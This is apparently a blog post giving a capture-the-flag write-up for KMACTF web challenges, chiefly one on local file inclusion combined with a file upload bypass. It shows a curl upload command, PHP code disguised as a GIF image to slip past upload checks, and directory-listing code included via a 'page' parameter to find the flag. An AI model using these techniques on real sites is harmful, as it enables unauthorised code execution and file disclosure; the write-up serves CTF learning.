Thứ Ba, 4 tháng 8, 2020

[KMACTF] WEB-EXPLOITATION WRITE-UP !


WEB00: WARM UP



IT'S ALMOST THE EASIEST CHALL IN THIS COMPETITON !



THIS IS THE FIRST PART OF THE FLAG .





DECODE THIS 




FLAG KMACTF{Ctrl_U_is_helpful!_Wh4t_do3s_JS_Say.?}


WEB 01









THIS CHALL IS ABOUT LFI + FILE UPLOAD CHALLENGE 
FIRSTLY ,  WE MUST BYPASS IMAGE UPLOAD MECHANISM . WE MUST UPLOAD BY CURL COMMAND .

curl -L -F 'file=@image.png' -H "API-KEY: my_api_key" http://cloud-storage.ctf.actvn.edu.vn:8080/api.php
MY "IMAGE" IS SOME LINES OF PHP CODE WITH GIF HEADER AND php.png EXTENSION TO BYPASS IMAGE UPLOAD RETRICTIONS .

GIF89a;
 
<?php
$path = getcwd();
$items = scandir($path);

echo "<p>Content of $path</p>";
echo '<ul>';
foreach ($items as $item) {
    echo '<li>' . $item . '</li>';
}
echo '</ul>';
?> 

THIS PHP CODE ABOVE WILL GIVE US THE CURRENT LOCATION AND ALL FILE&FOLDER IN THIS .


ACTUALLY I HAVE NO MORE EXP WITH CURL . SO . WITH THIS CURL , I CAN'T UPLOAD IMAGE TO THE SERVER , BECAUSE OF THE SINGLE QUOTE (' ') in 'file=@image.png' . LET'S SEE !



AFTER REMOVE THE SINGLE QUOTE , I CAN COMPLETELY UPLOAD "IMAGE" TO THE SERVER.

NEXT STEP , I INCULDE THIS FILE VIA LFI PARAM "page"




No description available.


SUCCESSFULLY ! 

I READ ALL FILES IN THIS FOLDER BUT NOTHING REALLY USEFUL .

SO I USE THIS CODE TO ENUMERATE ALL PHP file in /home FOLDER

GIF89a;
<?php
  
foreach (glob("/home/*.php") as $filename) {
    echo "$filename";
}
?> 
AND FORTUNETELY IT'S WORK ! A FILE NAMED flag.php IN THIS FOLDER .

LET'S CHECK IT !


FLAG :KMACTF{php is not a good choice for web development} 
 





































Không có nhận xét nào:

Đăng nhận xét

Phổ Biến